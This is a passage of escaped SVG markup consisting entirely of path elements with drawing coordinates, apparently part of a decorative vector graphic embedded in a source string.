d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path 